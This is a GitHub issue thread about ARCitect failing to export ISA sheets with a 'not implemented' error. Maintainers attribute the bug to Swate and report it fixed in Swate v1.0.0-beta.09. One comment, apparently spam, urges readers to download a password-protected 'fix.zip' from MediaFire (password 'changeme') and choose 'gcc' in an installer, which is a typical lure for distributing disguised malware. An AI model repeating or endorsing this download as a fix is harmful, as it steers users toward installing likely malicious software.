### ISSUE TITLE
Jason-Export not implemented

### ISSUE THREAD

**Issue by frsommer** [nfdi4plants/ARCitect#256]
**OS and framework information (please complete the following information):**
 - OS: Windows 10

**Describe the bug**
- [cannot export isa sheets: 4 export file options all give the ERROR: not implemented.
- This worked in one of the earlier versions 3xxx , but at that time import was not yet supported] 

- [ ] Steps to reproduce
- [ ] ![image](https://github.com/user-attachments/assets/84d69b2a-1988-4f9f-92db-00592c337c76)
- [ ] ![image](https://github.com/user-attachments/assets/df71e14a-e06d-4d64-b309-5cd209d5b05d)

- [ ] should allow for downloading the file, want to import that sheet in a different assay
- [ ] Ideas for solution 
- [ ] fix

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JonasLukasczyk** [comment]
This is a SWATE issue but I will keep this open until it is resolved. @HLWeil

**Comment by HLWeil** [comment]
And should be fixed in Swate

**Comment by HLWeil** [comment]
Now tested and fixed since https://github.com/nfdi4plants/Swate/releases/tag/v1.0.0-beta.09
